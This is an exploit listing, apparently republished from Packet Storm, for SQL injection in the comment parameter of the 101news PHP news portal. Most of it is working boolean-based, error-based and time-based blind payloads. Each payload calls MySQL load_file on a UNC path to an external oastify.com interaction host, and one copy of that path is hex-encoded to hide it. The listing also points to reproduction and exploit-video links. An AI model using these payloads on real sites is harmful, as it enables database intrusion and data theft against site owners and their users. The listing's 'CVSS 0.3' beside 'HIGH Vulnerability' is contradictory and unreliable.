Exploit for 101news By Mayuri K 1.0 SQL Injection

Name: Exploit for 101news By Mayuri K 1.0 SQL Injection
Rating: 5 (148 reviews)
2023-02-07 | CVSS 0.3
## https://sploitus.com/exploit?id=PACKETSTORM:170874
## Title: 101news-by-Mayuri-K-1.0 Multiple-SQLi  
## Author: nu11secur1ty  
## Date: 02.02.2023  
## Vendor: https://mayurik.com/  
## Software: https://mayurik.com/source-code/P4030/news-portal-project-in-php  
## Reference: https://portswigger.net/web-security/sql-injection  
  
## Description:  
The `comment` parameter appears to be vulnerable to SQL injection attacks.  
The payload '+(select  
load_file('\\\\1km7b3i42qkp4m2iy5ryphiobfh85zynpqdi0bo0.oastify.com\\bxf'))+'  
was submitted in the comment parameter.  
This payload injects a SQL sub-query that calls MySQL's load_file  
function with a UNC file path that references a URL on an external  
domain.  
The application interacted with that domain, indicating that the  
injected SQL query was executed. This system is absolutely  
UNPROTECTED!  
  
STATUS: HIGH Vulnerability  
  
[+]Payload:  
```mysql  
---  
Parameter: comment (POST)  
Type: boolean-based blind  
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY  
or GROUP BY clause  
Payload: csrftoken=6606c0284475034686192a71b81d3e9360096c1bc0fa486d4a8636d582e2b0c5&name=IRSaszTW&email=YxpqSxQd@burpcollaborator.net&comment=167565'+(select  
load_file('\\\\1km7b3i42qkp4m2iy5ryphiobfh85zynpqdi0bo0.oastify.com\\bxf'))+''  
RLIKE (SELECT (CASE WHEN (1140=1140) THEN 0x313637353635+(select  
load_file(0x5c5c5c5c316b6d376233693432716b70346d3269793572797068696f62666838357a796e7071646930626f302e6f6173746966792e636f6d5c5c627866))+''  
ELSE 0x28 END)) AND 'RBgF'='RBgF&submit=  
  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or  
GROUP BY clause (FLOOR)  
Payload: csrftoken=6606c0284475034686192a71b81d3e9360096c1bc0fa486d4a8636d582e2b0c5&name=IRSaszTW&email=YxpqSxQd@burpcollaborator.net&comment=167565'+(select  
load_file('\\\\1km7b3i42qkp4m2iy5ryphiobfh85zynpqdi0bo0.oastify.com\\bxf'))+''  
AND (SELECT 4135 FROM(SELECT COUNT(*),CONCAT(0x71766b6a71,(SELECT  
(ELT(4135=4135,1))),0x7171627071,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'iMBs'='iMBs&submit=  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: csrftoken=6606c0284475034686192a71b81d3e9360096c1bc0fa486d4a8636d582e2b0c5&name=IRSaszTW&email=YxpqSxQd@burpcollaborator.net&comment=167565'+(select  
load_file('\\\\1km7b3i42qkp4m2iy5ryphiobfh85zynpqdi0bo0.oastify.com\\bxf'))+''  
AND (SELECT 1879 FROM (SELECT(SLEEP(3)))AQLB) AND 'asLq'='asLq&submit=  
---  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/101news)  
  
## Proof and Exploit:  
[href](https://streamable.com/vrc7x8)  
  
## Time spend:  
01:00:00